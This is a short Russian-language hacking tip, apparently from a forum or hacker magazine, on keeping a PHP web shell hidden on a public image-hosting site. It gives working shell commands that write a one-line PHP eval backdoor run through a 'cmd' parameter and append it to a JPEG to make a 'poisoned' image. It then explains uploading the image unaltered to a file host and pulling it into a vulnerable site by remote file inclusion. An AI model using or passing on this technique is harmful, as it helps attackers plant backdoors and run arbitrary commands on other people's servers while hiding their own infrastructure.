Я не буду описывать способы всем давно
известные (можно положить на свой сервер, на народ, на залитый
уже шелл), но есть способ, о котором мне еще слышать не
приходилось, — он позволяет хранить шелл достаточно долго и при
этом не палить свои сервера и шеллы. Заливать шелл будем на
файловый хостинг, который дает прямые линки на хранимые файлы.
Предложил использовать этот способ geezer_code.
1. Создаем
любое изображение.
$ echo "<?php eval($_REQUEST[cmd]);?>" >
simple_shell.php
$ cat 1.jpeg simple_shell.php >> poisoned.jpeg
Картинка готова к загрузке.
2. Загружаем ее без ресайзинга и любых других преобразований
(это важно), например, на
imageshack.us.
3. Теперь можно инклудить ее по прямой ссылке с
файлообменника.
